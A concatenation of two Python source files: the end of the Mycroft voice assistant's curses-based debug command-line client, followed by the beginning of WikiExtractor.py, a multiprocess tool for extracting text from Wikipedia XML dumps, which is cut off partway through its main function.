return title + " " + ("=" * (bar_length - 1 - len(title)))
##############################################################################
# Help system
help_struct = [('Log Scrolling shortcuts',
[("Up / Down / PgUp / PgDn",
"scroll thru history"),
("Ctrl+T / Ctrl+PgUp",
"scroll to top of logs (jump to oldest)"),
("Ctrl+B / Ctrl+PgDn",
"scroll to bottom of logs" + "(jump to newest)"),
("Left / Right",
"scroll long lines left/right"),
("Home / End",
"scroll to start/end of long lines")]),
("Query History shortcuts",
[("Ctrl+N / Ctrl+Left",
"previous query"),
("Ctrl+P / Ctrl+Right",
"next query")]),
("General Commands (type ':' to enter command mode)",
[(":quit or :exit",
"exit the program"),
(":meter (show|hide)",
"display the microphone level"),
(":keycode (show|hide)",
"display typed key codes (mainly debugging)"),
(":history (# lines)",
"set size of visible history buffer"),
(":clear",
"flush the logs")]),
("Log Manipulation Commands",
[(":filter 'STR'",
"adds a log filter (optional quotes)"),
(":filter remove 'STR'",
"removes a log filter"),
(":filter (clear|reset)",
"reset filters"),
(":filter (show|list)",
"display current filters"),
(":find 'STR'",
"show logs containing 'str'"),
(":log level (DEBUG|INFO|ERROR)",
"set logging level"),
(":log bus (on|off)",
"control logging of messagebus messages")]),
("Skill Debugging Commands",
[(":skills",
"list installed Skills"),
(":api SKILL",
"show Skill's public API"),
(":activate SKILL",
"activate Skill, e.g. 'activate skill-wiki'"),
(":deactivate SKILL",
"deactivate Skill"),
(":keep SKILL",
"deactivate all Skills except the indicated Skill")])]
help_longest = 0
for s in help_struct:
for ent in s[1]:
help_longest = max(help_longest, len(ent[0]))
HEADER_SIZE = 2
HEADER_FOOTER_SIZE = 4
def num_help_pages():
lines = 0
for section in help_struct:
lines += 3 + len(section[1])
return ceil(lines / (curses.LINES - HEADER_FOOTER_SIZE))
def do_draw_help(scr):
def render_header():
scr.addstr(0, 0, center(25) + "Mycroft Command Line Help", CLR_HEADING)
scr.addstr(1, 0, "=" * (curses.COLS - 1), CLR_HEADING)
def render_help(txt, y_pos, i, first_line, last_line, clr):
if i >= first_line and i < last_line:
scr.addstr(y_pos, 0, txt, clr)
y_pos += 1
return y_pos
def render_footer(page, total):
text = "Page {} of {} [ Any key to continue ]".format(page, total)
scr.addstr(curses.LINES - 1, 0, center(len(text)) + text, CLR_HEADING)
scr.erase()
render_header()
y = HEADER_SIZE
page = subscreen + 1
# Find first and last taking into account the header and footer
first = subscreen * (curses.LINES - HEADER_FOOTER_SIZE)
last = first + (curses.LINES - HEADER_FOOTER_SIZE)
i = 0
for section in help_struct:
y = render_help(section[0], y, i, first, last, CLR_HEADING)
i += 1
y = render_help("=" * (curses.COLS - 1), y, i, first, last,
CLR_HEADING)
i += 1
for line in section[1]:
words = line[1].split()
ln = line[0].ljust(help_longest + 1)
for w in words:
if len(ln) + 1 + len(w) < curses.COLS:
ln += " " + w
else:
y = render_help(ln, y, i, first, last, CLR_CMDLINE)
ln = " ".ljust(help_longest + 2) + w
y = render_help(ln, y, i, first, last, CLR_CMDLINE)
i += 1
y = render_help(" ", y, i, first, last, CLR_CMDLINE)
i += 1
if i > last:
break
render_footer(page, num_help_pages())
# Curses doesn't actually update the display until refresh() is called
scr.refresh()
def show_help():
global screen_mode
global subscreen
if screen_mode != SCR_HELP:
screen_mode = SCR_HELP
subscreen = 0
set_screen_dirty()
def show_next_help():
global screen_mode
global subscreen
if screen_mode == SCR_HELP:
subscreen += 1
if subscreen >= num_help_pages():
screen_mode = SCR_MAIN
set_screen_dirty()
##############################################################################
# Skill debugging
def show_skills(skills):
"""Show list of loaded Skills in as many column as necessary."""
global scr
global screen_mode
if not scr:
return
screen_mode = SCR_SKILLS
row = 2
column = 0
def prepare_page():
global scr
nonlocal row
nonlocal column
scr.erase()
scr.addstr(0, 0, center(25) + "Loaded Skills", CLR_CMDLINE)
scr.addstr(1, 1, "=" * (curses.COLS - 2), CLR_CMDLINE)
row = 2
column = 0
prepare_page()
col_width = 0
skill_names = sorted(skills.keys())
for skill in skill_names:
if skills[skill]['active']:
color = curses.color_pair(4)
else:
color = curses.color_pair(2)
scr.addstr(row, column, " {}".format(skill), color)
row += 1
col_width = max(col_width, len(skill))
if row == curses.LINES - 2 and column > 0 and skill != skill_names[-1]:
column = 0
scr.addstr(curses.LINES - 1, 0,
center(23) + "Press any key to continue", CLR_HEADING)
scr.refresh()
wait_for_any_key()
prepare_page()
elif row == curses.LINES - 2:
# Reached bottom of screen, start at top and move output to a
# New column
row = 2
column += col_width + 2
col_width = 0
if column > curses.COLS - 20:
# End of screen
break
scr.addstr(curses.LINES - 1, 0, center(23) + "Press any key to return",
CLR_HEADING)
scr.refresh()
def show_skill_api(skill, data):
"""Show available help on Skill's API."""
global scr
global screen_mode
if not scr:
return
screen_mode = SCR_SKILLS
row = 2
column = 0
def prepare_page():
global scr
nonlocal row
nonlocal column
scr.erase()
scr.addstr(0, 0, center(25) + "Skill-API for {}".format(skill),
CLR_CMDLINE)
scr.addstr(1, 1, "=" * (curses.COLS - 2), CLR_CMDLINE)
row = 2
column = 4
prepare_page()
for key in data:
color = curses.color_pair(4)
scr.addstr(row, column, "{} ({})".format(key, data[key]['type']),
CLR_HEADING)
row += 2
if 'help' in data[key]:
help_text = data[key]['help'].split('\n')
for line in help_text:
scr.addstr(row, column + 2, line, color)
row += 1
row += 2
else:
row += 1
if row == curses.LINES - 5:
scr.addstr(curses.LINES - 1, 0,
center(23) + "Press any key to continue", CLR_HEADING)
scr.refresh()
wait_for_any_key()
prepare_page()
elif row == curses.LINES - 5:
# Reached bottom of screen, start at top and move output to a
# New column
row = 2
scr.addstr(curses.LINES - 1, 0, center(23) + "Press any key to return",
CLR_HEADING)
scr.refresh()
def center(str_len):
# generate number of characters needed to center a string
# of the given length
return " " * ((curses.COLS - str_len) // 2)
##############################################################################
# Main UI lopo
def _get_cmd_param(cmd, keyword):
# Returns parameter to a command. Will de-quote.
# Ex: find 'abc def' returns: abc def
# find abc def returns: abc def
if isinstance(keyword, list):
for w in keyword:
cmd = cmd.replace(w, "").strip()
else:
cmd = cmd.replace(keyword, "").strip()
if not cmd:
return None
last_char = cmd[-1]
if last_char == '"' or last_char == "'":
parts = cmd.split(last_char)
return parts[-2]
else:
parts = cmd.split(" ")
return parts[-1]
def wait_for_any_key():
"""Block until key is pressed.
This works around curses.error that can occur on old versions of ncurses.
"""
while True:
try:
scr.get_wch() # blocks
except curses.error:
# Loop if get_wch throws error
time.sleep(0.05)
else:
break
def handle_cmd(cmd):
global show_meter
global screen_mode
global log_filters
global cy_chat_area
global find_str
global show_last_key
if "show" in cmd and "log" in cmd:
pass
elif "help" in cmd:
show_help()
elif "exit" in cmd or "quit" in cmd:
return 1
elif "keycode" in cmd:
# debugging keyboard
if "hide" in cmd or "off" in cmd:
show_last_key = False
elif "show" in cmd or "on" in cmd:
show_last_key = True
elif "meter" in cmd:
# microphone level meter
if "hide" in cmd or "off" in cmd:
show_meter = False
elif "show" in cmd or "on" in cmd:
show_meter = True
elif "find" in cmd:
find_str = _get_cmd_param(cmd, "find")
rebuild_filtered_log()
elif "filter" in cmd:
if "show" in cmd or "list" in cmd:
# display active filters
add_log_message("Filters: " + str(log_filters))
return
if "reset" in cmd or "clear" in cmd:
log_filters = list(default_log_filters)
else:
# extract last word(s)
param = _get_cmd_param(cmd, "filter")
if param:
if "remove" in cmd and param in log_filters:
log_filters.remove(param)
else:
log_filters.append(param)
rebuild_filtered_log()
add_log_message("Filters: " + str(log_filters))
elif "clear" in cmd:
clear_log()
elif "log" in cmd:
# Control logging behavior in all Mycroft processes
if "level" in cmd:
level = _get_cmd_param(cmd, ["log", "level"])
bus.emit(Message("mycroft.debug.log", data={'level': level}))
elif "bus" in cmd:
state = _get_cmd_param(cmd, ["log", "bus"]).lower()
if state in ["on", "true", "yes"]:
bus.emit(Message("mycroft.debug.log", data={'bus': True}))
elif state in ["off", "false", "no"]:
bus.emit(Message("mycroft.debug.log", data={'bus': False}))
elif "history" in cmd:
# extract last word(s)
lines = int(_get_cmd_param(cmd, "history"))
if not lines or lines < 1:
lines = 1
max_chat_area = curses.LINES - 7
if lines > max_chat_area:
lines = max_chat_area
cy_chat_area = lines
elif "skills" in cmd:
# List loaded skill
message = bus.wait_for_response(
Message('skillmanager.list'), reply_type='mycroft.skills.list')
if message:
show_skills(message.data)
wait_for_any_key()
screen_mode = SCR_MAIN
set_screen_dirty()
elif "deactivate" in cmd:
skills = cmd.split()[1:]
if len(skills) > 0:
for s in skills:
bus.emit(Message("skillmanager.deactivate", data={'skill': s}))
else:
add_log_message('Usage :deactivate SKILL [SKILL2] [...]')
elif "keep" in cmd:
s = cmd.split()
if len(s) > 1:
bus.emit(Message("skillmanager.keep", data={'skill': s[1]}))
else:
add_log_message('Usage :keep SKILL')
elif "activate" in cmd:
skills = cmd.split()[1:]
if len(skills) > 0:
for s in skills:
bus.emit(Message("skillmanager.activate", data={'skill': s}))
else:
add_log_message('Usage :activate SKILL [SKILL2] [...]')
elif "api" in cmd:
parts = cmd.split()
if len(parts) < 2:
return
skill = parts[1]
message = bus.wait_for_response(Message('{}.public_api'.format(skill)))
if message:
show_skill_api(skill, message.data)
scr.get_wch() # blocks
screen_mode = SCR_MAIN
set_screen_dirty()
# TODO: More commands
return 0 # do nothing upon return
def handle_is_connected(msg):
add_log_message("Connected to Messagebus!")
# start_qml_gui(bus, gui_text)
def handle_reconnecting():
add_log_message("Looking for Messagebus websocket...")
def gui_main(stdscr):
global scr
global bus
global line
global log_line_lr_scroll
global longest_visible_line
global find_str
global last_key
global history
global screen_lock
global show_gui
global config
scr = stdscr
init_screen()
scr.keypad(1)
scr.notimeout(True)
bus.on('speak', handle_speak)
bus.on('message', handle_message)
bus.on('recognizer_loop:utterance', handle_utterance)
bus.on('connected', handle_is_connected)
bus.on('reconnecting', handle_reconnecting)
add_log_message("Establishing Mycroft Messagebus connection...")
gui_thread = ScreenDrawThread()
gui_thread.setDaemon(True) # this thread won't prevent prog from exiting
gui_thread.start()
hist_idx = -1 # index, from the bottom
c = 0
try:
while True:
set_screen_dirty()
c = 0
code = 0
try:
if ctrl_c_pressed():
# User hit Ctrl+C. treat same as Ctrl+X
c = 24
else:
# Don't block, this allows us to refresh the screen while
# waiting on initial messagebus connection, etc
scr.timeout(1)
c = scr.get_wch() # unicode char or int for special keys
if c == -1:
continue
except curses.error:
# This happens in odd cases, such as when you Ctrl+Z
# the CLI and then resume. Curses fails on get_wch().
continue
if isinstance(c, int):
code = c
else:
code = ord(c)
# Convert VT100 ESC codes generated by some terminals
if code == 27:
# NOTE: Not sure exactly why, but the screen can get corrupted
# if we draw to the screen while doing a scr.getch(). So
# lock screen updates until the VT100 sequence has been
# completely read.
with screen_lock:
scr.timeout(0)
c1 = -1
start = time.time()
while c1 == -1:
c1 = scr.getch()
if time.time() - start > 1:
break # 1 second timeout waiting for ESC code
c2 = -1
while c2 == -1:
c2 = scr.getch()
if time.time() - start > 1: # 1 second timeout
break # 1 second timeout waiting for ESC code
if c1 == 79 and c2 == 120:
c = curses.KEY_UP
elif c1 == 79 and c2 == 116:
c = curses.KEY_LEFT
elif c1 == 79 and c2 == 114:
c = curses.KEY_DOWN
elif c1 == 79 and c2 == 118:
c = curses.KEY_RIGHT
elif c1 == 79 and c2 == 121:
c = curses.KEY_PPAGE # aka PgUp
elif c1 == 79 and c2 == 115:
c = curses.KEY_NPAGE # aka PgDn
elif c1 == 79 and c2 == 119:
c = curses.KEY_HOME
elif c1 == 79 and c2 == 113:
c = curses.KEY_END
else:
c = c1
if c1 != -1:
last_key = str(c) + ",ESC+" + str(c1) + "+" + str(c2)
code = c
else:
last_key = "ESC"
else:
if code < 33:
last_key = str(code)
else:
last_key = str(code)
scr.timeout(-1) # resume blocking
if code == 27: # Hitting ESC twice clears the entry line
hist_idx = -1
line = ""
elif c == curses.KEY_RESIZE:
# Generated by Curses when window/screen has been resized
y, x = scr.getmaxyx()
curses.resizeterm(y, x)
# resizeterm() causes another curses.KEY_RESIZE, so
# we need to capture that to prevent a loop of resizes
c = scr.get_wch()
elif screen_mode == SCR_HELP:
# in Help mode, any key goes to next page
show_next_help()
continue
elif c == '\n' or code == 10 or code == 13 or code == 343:
# ENTER sends the typed line to be processed by Mycroft
if line == "":
continue
if line[:1] == ":":
# Lines typed like ":help" are 'commands'
if handle_cmd(line[1:]) == 1:
break
else:
# Treat this as an utterance
bus.emit(Message("recognizer_loop:utterance",
{'utterances': [line.strip()],
'lang': config.get('lang', 'en-us')},
{'client_name': 'mycroft_cli',
'source': 'debug_cli',
'destination': ["skills"]}
))
hist_idx = -1
line = ""
elif code == 16 or code == 545: # Ctrl+P or Ctrl+Left (Previous)
# Move up the history stack
hist_idx = clamp(hist_idx + 1, -1, len(history) - 1)
if hist_idx >= 0:
line = history[len(history) - hist_idx - 1]
else:
line = ""
elif code == 14 or code == 560: # Ctrl+N or Ctrl+Right (Next)
# Move down the history stack
hist_idx = clamp(hist_idx - 1, -1, len(history) - 1)
if hist_idx >= 0:
line = history[len(history) - hist_idx - 1]
else:
line = ""
elif c == curses.KEY_LEFT:
# scroll long log lines left
log_line_lr_scroll += curses.COLS // 4
elif c == curses.KEY_RIGHT:
# scroll long log lines right
log_line_lr_scroll -= curses.COLS // 4
if log_line_lr_scroll < 0:
log_line_lr_scroll = 0
elif c == curses.KEY_HOME:
# HOME scrolls log lines all the way to the start
log_line_lr_scroll = longest_visible_line
elif c == curses.KEY_END:
# END scrolls log lines all the way to the end
log_line_lr_scroll = 0
elif c == curses.KEY_UP:
scroll_log(False, 1)
elif c == curses.KEY_DOWN:
scroll_log(True, 1)
elif c == curses.KEY_NPAGE: # aka PgDn
# PgDn to go down a page in the logs
scroll_log(True)
elif c == curses.KEY_PPAGE: # aka PgUp
# PgUp to go up a page in the logs
scroll_log(False)
elif code == 2 or code == 550: # Ctrl+B or Ctrl+PgDn
scroll_log(True, max_log_lines)
elif code == 20 or code == 555: # Ctrl+T or Ctrl+PgUp
scroll_log(False, max_log_lines)
elif code == curses.KEY_BACKSPACE or code == 127:
# Backspace to erase a character in the utterance
line = line[:-1]
elif code == 6: # Ctrl+F (Find)
line = ":find "
elif code == 7: # Ctrl+G (start GUI)
if show_gui is None:
start_qml_gui(bus, gui_text)
show_gui = not show_gui
elif code == 18: # Ctrl+R (Redraw)
scr.erase()
elif code == 24: # Ctrl+X (Exit)
if find_str:
# End the find session
find_str = None
rebuild_filtered_log()
elif line.startswith(":"):
# cancel command mode
line = ""
else:
# exit CLI
break
elif code > 31 and isinstance(c, str):
# Accept typed character in the utterance
line += c
finally:
scr.erase()
scr.refresh()
scr = None
def simple_cli():
global bSimple
bSimple = True
bus.on('speak', handle_speak)
try:
while True:
# Sleep for a while so all the output that results
# from the previous command finishes before we print.
time.sleep(1.5)
print("Input (Ctrl+C to quit):")
line = sys.stdin.readline()
bus.emit(Message("recognizer_loop:utterance",
{'utterances': [line.strip()]},
{'client_name': 'mycroft_simple_cli',
'source': 'debug_cli',
'destination': ["skills"]}))
except KeyboardInterrupt as e:
# User hit Ctrl+C to quit
print("")
except KeyboardInterrupt as e:
LOG.exception(e)
event_thread.exit()
sys.exit()
def connect_to_messagebus():
""" Connect to the mycroft messagebus and launch a thread handling the
connection.
Returns: WebsocketClient
"""
bus = MessageBusClient() # Mycroft messagebus connection
event_thread = Thread(target=connect, args=[bus])
event_thread.setDaemon(True)
event_thread.start()
return bus
|
WikiExtractor.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# =============================================================================
# Version: 3.0 (July 22, 2020)
# Author: Giuseppe Attardi (attardi@di.unipi.it), University of Pisa
#
# Contributors:
# Antonio Fuschetto (fuschett@aol.com)
# Leonardo Souza (lsouza@amtera.com.br)
# Juan Manuel Caicedo (juan@cavorite.com)
# Humberto Pereira (begini@gmail.com)
# Siegfried-A. Gevatter (siegfried@gevatter.com)
# Pedro Assis (pedroh2306@gmail.com)
# Wim Muskee (wimmuskee@gmail.com)
# Radics Geza (radicsge@gmail.com)
# Nick Ulven (nulven@github)
#
# =============================================================================
# Copyright (c) 2009-2020. Giuseppe Attardi (attardi@di.unipi.it).
# =============================================================================
# This file is part of Tanl.
#
# Tanl is free software; you can redistribute it and/or modify it
# under the terms of the GNU Affero General Public License, version 3,
# as published by the Free Software Foundation.
#
# Tanl is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
# =============================================================================
"""Wikipedia Extractor:
Extracts and cleans text from a Wikipedia database dump and stores output in a
number of files of similar size in a given directory.
Each file will contain several documents in the format:
<doc id="" url="" title="">
...
</doc>
If the program is invoked with the --json flag, then each file will
contain several documents formatted as json ojects, one per line, with
the following structure
{"id": "", "revid": "", "url": "", "title": "", "text": "..."}
The program performs template expansion by preprocesssng the whole dump and
collecting template definitions.
"""
import argparse
import bz2
import logging
import os.path
import re # TODO use regex when it will be standard
import sys
from io import StringIO
from multiprocessing import Queue, Process, cpu_count
from timeit import default_timer
sys.path.append('/content/drive/MyDrive/Thesis/projectFiles/wikiextractor/wikiextractor')
from extract import Extractor, ignoreTag, define_template, acceptedNamespaces
# ===========================================================================
# Program version
__version__ = '3.0.5'
##
# Defined in <siteinfo>
# We include as default Template, when loading external template file.
knownNamespaces = set(['Template'])
##
# The namespace used for template definitions
# It is the name associated with namespace key=10 in the siteinfo header.
templateNamespace = ''
templatePrefix = ''
##
# The namespace used for module definitions
# It is the name associated with namespace key=828 in the siteinfo header.
moduleNamespace = ''
# ----------------------------------------------------------------------
# Modules
# Only minimal support
# FIXME: import Lua modules.
modules = {
'convert': {
'convert': lambda x, u, *rest: x + ' ' + u, # no conversion
}
}
# ----------------------------------------------------------------------
# Expand using WikiMedia API
# import json
# def expandTemplates(text):
# """Expand templates invoking MediaWiki API"""
# text = urlib.urlencodew(text.encode('utf-8'))
# base = urlbase[:urlbase.rfind('/')]
# url = base + "/w/api.php?action=expandtemplates&format=json&text=" + text
# exp = json.loads(urllib.urlopen(url))
# return exp['expandtemplates']['*']
# ------------------------------------------------------------------------------
# Output
class NextFile():
"""
Synchronous generation of next available file name.
"""
filesPerDir = 100
def __init__(self, path_name):
self.path_name = path_name
self.dir_index = -1
self.file_index = -1
def next(self):
self.file_index = (self.file_index + 1) % NextFile.filesPerDir
if self.file_index == 0:
self.dir_index += 1
dirname = self._dirname()
if not os.path.isdir(dirname):
os.makedirs(dirname)
return self._filepath()
def _dirname(self):
char1 = self.dir_index % 26
char2 = int(self.dir_index / 26) % 26
return os.path.join(self.path_name, '%c%c' % (ord('A') + char2, ord('A') + char1))
def _filepath(self):
return '%s/wiki_%02d' % (self._dirname(), self.file_index)
class OutputSplitter():
"""
File-like object, that splits output to multiple files of a given max size.
"""
def __init__(self, nextFile, max_file_size=0, compress=True):
"""
:param nextFile: a NextFile object from which to obtain filenames
to use.
:param max_file_size: the maximum size of each file.
:para compress: whether to write data with bzip compression.
"""
self.nextFile = nextFile
self.compress = compress
self.max_file_size = max_file_size
self.file = self.open(self.nextFile.next())
def reserve(self, size):
if self.file.tell() + size > self.max_file_size:
self.close()
self.file = self.open(self.nextFile.next())
def write(self, data):
self.reserve(len(data))
if self.compress:
self.file.write(data.encode('utf-8'))
else:
self.file.write(data)
def close(self):
self.file.close()
def open(self, filename):
if self.compress:
return bz2.BZ2File(filename + '.bz2', 'w')
else:
return open(filename, 'w')
# ----------------------------------------------------------------------
# READER
tagRE = re.compile(r'(.*?)<(/?\w+)[^>]*>(?:([^<]*)(<.*?>)?)?')
# 1 2 3 4
def load_templates(file, output_file=None):
"""
Load templates from :param file:.
:param output_file: file where to save templates and modules.
"""
global templateNamespace, templatePrefix
templatePrefix = templateNamespace + ':'
global moduleNamespace, modulePrefix
modulePrefix = moduleNamespace + ':'
articles = 0
templates = 0
page = []
inText = False
if output_file:
output = open(output_file, 'w')
for line in file:
#line = line.decode('utf-8')
if '<' not in line: # faster than doing re.search()
if inText:
page.append(line)
continue
m = tagRE.search(line)
if not m:
continue
tag = m.group(2)
if tag == 'page':
page = []
elif tag == 'title':
title = m.group(3)
elif tag == 'text':
inText = True
line = line[m.start(3):m.end(3)]
page.append(line)
if m.lastindex == 4: # open-close
inText = False
elif tag == '/text':
if m.group(1):
page.append(m.group(1))
inText = False
elif inText:
page.append(line)
elif tag == '/page':
if not output_file and not templateNamespace: # do not know it yet
# we reconstruct it from the first title
colon = title.find(':')
if colon > 1:
templateNamespace = title[:colon]
templatePrefix = title[:colon + 1]
# FIXME: should reconstruct also moduleNamespace
if title.startswith(templatePrefix):
define_template(title, page)
templates += 1
# save templates and modules to file
if output_file and (title.startswith(templatePrefix) or
title.startswith(modulePrefix)):
output.write('<page>\n')
output.write(' <title>%s</title>\n' % title.encode('utf-8'))
output.write(' <ns>10</ns>\n')
output.write(' <text>')
for line in page:
output.write(line.encode('utf-8'))
output.write(' </text>\n')
output.write('</page>\n')
page = []
articles += 1
if articles % 100000 == 0:
logging.info("Preprocessed %d pages", articles)
if output_file:
output.close()
logging.info("Saved %d templates to '%s'", templates, output_file)
return templates
def decode_open(filename, mode='rt', encoding='utf-8'):
"""
Open a file, decode and decompress, depending on extension `gz`, or 'bz2`.
:param filename: the file to open.
"""
ext = os.path.splitext(filename)[1]
if ext == '.gz':
import gzip
return gzip.open(filename, mode, encoding=encoding)
elif ext == '.bz2':
return bz2.open(filename, mode=mode, encoding=encoding)
else:
return open(filename, mode, encoding=encoding)
def process_dump(input_file, template_file, out_file, file_size, file_compress,
process_count, html_safe):
"""
:param input_file: name of the wikipedia dump file; '-' to read from stdin
:param template_file: optional file with template definitions.
:param out_file: directory where to store extracted data, or '-' for stdout
:param file_size: max size of each extracted file, or None for no max (one file)
:param file_compress: whether to compress files with bzip.
:param process_count: number of extraction processes to spawn.
"""
global knownNamespaces
global templateNamespace, templatePrefix
global moduleNamespace, modulePrefix
urlbase = '' # This is obtained from <siteinfo>
input = decode_open(input_file)
# collect siteinfo
for line in input:
line = line #.decode('utf-8')
m = tagRE.search(line)
if not m:
continue
tag = m.group(2)
if tag == 'base':
# discover urlbase from the xml dump file
# /mediawiki/siteinfo/base
base = m.group(3)
urlbase = base[:base.rfind("/")]
elif tag == 'namespace':
knownNamespaces.add(m.group(3))
if re.search('key="10"', line):
templateNamespace = m.group(3)
templatePrefix = templateNamespace + ':'
elif re.search('key="828"', line):
moduleNamespace = m.group(3)
modulePrefix = moduleNamespace + ':'
elif tag == '/siteinfo':
break
if expand_templates:
# preprocess
template_load_start = default_timer()
if template_file and os.path.exists(template_file):
logging.info("Preprocessing '%s' to collect template definitions: this may take some time.", template_file)
file = decode_open(template_file)
templates = load_templates(file)
file.close()
else:
if input_file == '-':
# can't scan then reset stdin; must error w/ suggestion to specify template_file
raise ValueError("to use templates with stdin dump, must supply explicit template-file")
logging.info("Preprocessing '%s' to collect template definitions: this may take some time.", input_file)
templates = load_templates(input, template_file)
input.close()
input = decode_open(input_file)
template_load_elapsed = default_timer() - template_load_start
logging.info("Loaded %d templates in %.1fs", templates, template_load_elapsed)
if out_file == '-':
output = sys.stdout
if file_compress:
logging.warn("writing to stdout, so no output compression (use an external tool)")
else:
nextFile = NextFile(out_file)
output = OutputSplitter(nextFile, file_size, file_compress)
# process pages
logging.info("Starting page extraction from %s.", input_file)
extract_start = default_timer()
# Parallel Map/Reduce:
# - pages to be processed are dispatched to workers
# - a reduce process collects the results, sort them and print them.
maxsize = 10 * process_count
# output queue
output_queue = Queue(maxsize=maxsize)
# Reduce job that sorts and prints output
reduce = Process(target=reduce_process, args=(output_queue, output))
reduce.start()
# initialize jobs queue
jobs_queue = Queue(maxsize=maxsize)
# start worker processes
logging.info("Using %d extract processes.", process_count)
workers = []
for _ in range(max(1, process_count)):
extractor = Process(target=extract_process,
args=(jobs_queue, output_queue, html_safe))
extractor.daemon = True # only live while parent process lives
extractor.start()
workers.append(extractor)
# Mapper process
# we collect individual lines, since str.join() is significantly faster
# than concatenation
page = []
id = ''
revid = ''
last_id = ''
ordinal = 0 # page count
inText = False
redirect = False
for line in input:
if '<' not in line: # faster than doing re.search()
if inText:
page.append(line)
continue
m = tagRE.search(line)
if not m:
continue
tag = m.group(2)
if tag == 'page':
page = []
redirect = False
elif tag == 'id' and not id:
id = m.group(3)
elif tag == 'id' and id: # <revision> <id></id> </revision>
revid = m.group(3)
elif tag == 'title':
title = m.group(3)
elif tag == 'redirect':
redirect = True
elif tag == 'text':
inText = True
line = line[m.start(3):m.end(3)]
page.append(line)
if m.lastindex == 4: # open-close
inText = False
elif tag == '/text':
if m.group(1):
page.append(m.group(1))
inText = False
elif inText:
page.append(line)
elif tag == '/page':
colon = title.find(':')
if (colon < 0 or (title[:colon] in acceptedNamespaces) and id != last_id and
not redirect and not title.startswith(templateNamespace)):
job = (id, revid, urlbase, title, page, ordinal)
jobs_queue.put(job) # goes to any available extract_process
last_id = id
ordinal += 1
id = ''
revid = ''
page = []
input.close()
# signal termination
for _ in workers:
jobs_queue.put(None)
# wait for workers to terminate
for w in workers:
w.join()
# signal end of work to reduce process
output_queue.put(None)
# wait for it to finish
reduce.join()
if output != sys.stdout:
output.close()
extract_duration = default_timer() - extract_start
extract_rate = ordinal / extract_duration
logging.info("Finished %d-process extraction of %d articles in %.1fs (%.1f art/s)",
process_count, ordinal, extract_duration, extract_rate)
# ----------------------------------------------------------------------
# Multiprocess support
def extract_process(jobs_queue, output_queue, html_safe):
"""Pull tuples of raw page content, do CPU/regex-heavy fixup, push finished text
:param jobs_queue: where to get jobs.
:param output_queue: where to queue extracted text for output.
:html_safe: whether to convert entities in text to HTML.
"""
while True:
job = jobs_queue.get() # job is (id, revid, urlbase, title, page, ordinal)
if job:
out = StringIO() # memory buffer
Extractor(*job[:-1]).extract(out, html_safe) # (id, urlbase, title, page)
text = out.getvalue()
output_queue.put((job[-1], text)) # (ordinal, extracted_text)
out.close()
else:
break
def reduce_process(output_queue, output):
"""Pull finished article text, write series of files (or stdout)
:param output_queue: text to be output.
:param output: file object where to print.
"""
interval_start = default_timer()
period = 100000
# FIXME: use a heap
ordering_buffer = {} # collected pages
next_ordinal = 0 # sequence number of pages
while True:
if next_ordinal in ordering_buffer:
output.write(ordering_buffer.pop(next_ordinal))
next_ordinal += 1
# progress report
if next_ordinal % period == 0:
interval_rate = period / (default_timer() - interval_start)
logging.info("Extracted %d articles (%.1f art/s)",
next_ordinal, interval_rate)
interval_start = default_timer()
else:
# mapper puts None to signal finish
pair = output_queue.get()
if not pair:
break
ordinal, text = pair
ordering_buffer[ordinal] = text
# ----------------------------------------------------------------------
# Minimum size of output files
minFileSize = 200 * 1024
def main():
global urlbase, acceptedNamespaces
global expand_templates, templateCache
parser = argparse.ArgumentParser(prog=os.path.basename(sys.argv[0]),
formatter_class=argparse.RawDescriptionHelpFormatter,
description=__doc__)
parser.add_argument("input",
help="XML wiki dump file")
groupO = parser.add_argument_group('Output')
groupO.add_argument("-o", "--output", default="text",
help="directory for extracted files (or '-' for dumping to stdout)")
groupO.add_argument("-b", "--bytes", default="1M",
help="maximum bytes per output file (default %(default)s)",
metavar="n[KMG]")
groupO.add_argument("-c", "--compress", action="store_true",
help="compress output files using bzip")
groupO.add_argument("--json", action="store_true",
help="write output in json format instead of the default <doc> format")
groupP = parser.add_argument_group('Processing')
groupP.add_argument("--html", action="store_true",
help="produce HTML output, subsumes --links")
groupP.add_argument("-l", "--links", action="store_true",
help="preserve links")
groupP.add_argument("-ns", "--namespaces", default="", metavar="ns1,ns2",
help="accepted namespaces")
groupP.add_argument("--templates",
help="use or create file containing templates")
groupP.add_argument("--no-templates", action="store_false",
help="Do not expand templates")
groupP.add_argument("--html-safe", default=True,
help="use to produce HTML safe output within <doc>...</doc>")
default_process_count = cpu_count() - 1
parser.add_argument("--processes", type=int, default=default_process_count,
help="Number of processes to use (default %(default)s)")
groupS = parser.add_argument_group('Special')
groupS.add_argument("-q", "--quiet", action="store_true",
help="suppress reporting progress info")
groupS.add_argument("--debug", action="store_true",
help="print debug info")
groupS.add_argument("-a", "--article", action="store_true",
help="analyze a file containing a single article (debug option)")
groupS.add_argument("-v", "--version", action="version",
version='%(prog)s ' + __version__,
help="print program version")
args = parser.parse_args()
Extractor.keepLinks = args.links
Extractor.HtmlFormatting = args.html
if args.html:
Extractor.keepLinks = True
Extractor.to_json = args.json
expand_templates = args.no_templates
try:
power = 'kmg'.find(args.bytes[-1].lower()) + 1
file_size = int(args.bytes[:-1]) * 1024 ** power
if file_size < minFileSize:
raise ValueError()
except ValueError:
logging.error('Insufficient or invalid size: %s', args.bytes)
return
if args.namespaces:
acceptedNamespaces = set(args.namespaces.split(','))
FORMAT = '%(levelname)s: %(message)s'
logging.basicConfig(format=FORMAT)
logger = logging.getLogger()
if not args.quiet:
logger.setLevel(logging.INFO)
if args.debug:
logger.setLevel(logging.DEBUG)
input_file = args.input
if not Extractor.keepLinks:
ignoreTag('a')
# sharing cache of parser templates is too slow:
# manager = Manager()
# templateCache = manager.dict()
if args.article:
if args.templates:
if os.path.exists(args.templates):
with open(args.templates) as file:
load_templates(file)
with open(input_file) as file:
page = file.read()
ids = re.findall(r'<id>(\d*?)</id>', page)
id = ids[0] if ids else ''
revid = ids[1] if len(ids) > 1 else ''
m = re.search(r'<title>(.*?)</title>', page)
if m:
title = m.group(1)
else:
logging.error('Missing title element')
return
m = re.search(r'<base>(.*?)</base>', page)
if m:
base = m.group(1)
urlbase = base[:base.rfind("/")]
else:
urlbase = ''
Extractor(id, revid, urlbase, title, [page]).extract(sys.stdout)
return
output_path = args.output
if output_path != '-' and not os.path.isdir(output_path):
try:
